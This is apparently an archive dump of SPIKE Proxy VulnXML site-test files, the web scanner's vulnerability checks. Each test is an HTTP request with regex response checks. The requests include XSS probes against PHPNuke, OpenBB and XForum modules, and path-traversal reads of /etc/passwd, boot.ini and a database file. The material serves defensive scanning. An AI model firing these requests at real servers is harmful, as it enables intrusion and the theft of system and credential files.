Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-383.xml0100664000076500007650000000765607566204543017600 0ustar davedave (modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-384.xml0100664000076500007650000000765407566204543017577 0ustar davedave (modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-385.xml0100664000076500007650000000750207566204543017570 0ustar davedave (modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-386.xml0100664000076500007650000000755207566204543017576 0ustar davedave (modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-387.xml0100664000076500007650000000730507566204543017573 0ustar davedave (modules.php?op=modload&name=0&file=0) "PHP Nuke is configured to give descriptive error messages which can reveal file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=0&file=0 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening 200 Failed opening 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-388.xml0100664000076500007650000000763207566204543017577 0ustar davedave (modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>) "The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-389.xml0100664000076500007650000000760007566204543017573 0ustar davedave (modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-38.xml0100664000076500007650000000727707566204543017514 0ustar davedave (index.html.hr.iso8859-2) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.hr.iso8859-2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-390.xml0100664000076500007650000000763407566204543017572 0ustar davedave (modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>) "This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-391.xml0100664000076500007650000000757607566204543017600 0ustar davedave (modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-392.xml0100664000076500007650000000764007566204543017571 0ustar davedave (modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>) "The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-393.xml0100664000076500007650000000740107566204543017565 0ustar davedave (modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink) "PHP Nuke is configured to give descriptive error messages which can reveal file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening 200 Failed opening 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-394.xml0100664000076500007650000000760507566204543017574 0ustar davedave (modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>) "Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-395.xml0100664000076500007650000000757707566204543017605 0ustar davedave (modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2) "The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-396.xml0100664000076500007650000000766507566204543017604 0ustar davedave (modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>) "The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-397.xml0100664000076500007650000000754207566204543017577 0ustar davedave (modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd) "Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-398.xml0100664000076500007650000000712707566204543017577 0ustar davedave (mod_ose_docs) "Default Oracle documentation found." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mod_ose_docs HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Oracle Servlet Engine 200 Oracle Servlet Engine 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-399.xml0100664000076500007650000000700207566204543017570 0ustar davedave (mp3/) "Uh oh..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mp3/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-39.xml0100664000076500007650000000725307566204543017507 0ustar davedave (index.html.it) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.it HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-400.xml0100664000076500007650000000750507566204543017557 0ustar davedave (myhome.php?action=messages&box=<script>alert('Vulnerable')</script>) "OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-401.xml0100664000076500007650000000714607566204543017561 0ustar davedave (mylog.phtml?screen=/etc/passwd) "Remote file read vulnerability CVE-1999-0346" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mylog.phtml?screen=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-402.xml0100664000076500007650000000711507566204543017556 0ustar davedave (ncl_items.html) "This may allow attackers to reconfigure your Tektronix printer." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ncl_items.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-403.xml0100664000076500007650000000714307566204543017560 0ustar davedave (ncl_items.shtml?SUBJECT=1) "This may allow attackers to reconfigure your Tektronix printer." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ncl_items.shtml?SUBJECT=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-404.xml0100664000076500007650000000731707566204543017564 0ustar davedave (netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd) "Sybex E-Trainer allows arbitrary files to be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-405.xml0100664000076500007650000000731707566204543017565 0ustar davedave (netget?sid=user&msg=300&file=../../../../../../../../../boot.ini) "Sybex E-Trainer allows arbitrary files to be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /netget?sid=user&msg=300&file=../../../../../../../../../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-406.xml0100664000076500007650000000702607566204543017563 0ustar davedave (new/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /new/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-407.xml0100664000076500007650000000726607566204543017572 0ustar davedave (newuser?Image=../../database/rbsserv.mdb) "The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /newuser?Image=../../database/rbsserv.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SystemErrorsPerHour 200 SystemErrorsPerHour 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-408.xml0100664000076500007650000000720007566204543017557 0ustar davedave (opendir.php?/etc/passwd) "This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /opendir.php?/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-409.xml0100664000076500007650000000722607566204543017570 0ustar davedave (opendir.php?requesturl=/etc/passwd) "This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /opendir.php?requesturl=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-40.xml0100664000076500007650000000730107566204543017471 0ustar davedave (index.html.ja.iso2022-jp) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ja.iso2022-jp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-410.xml0100664000076500007650000000715407566204543017560 0ustar davedave (oprocmgr-status) "Oracle 9iAS default install allows access to the Java Process Manager." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /oprocmgr-status HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Module Name 200 Module Name 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-411.xml0100664000076500007650000000703407566204543017556 0ustar davedave (oracle/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /oracle/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-412.xml0100664000076500007650000000703207566204543017555 0ustar davedave (order/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /order/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled 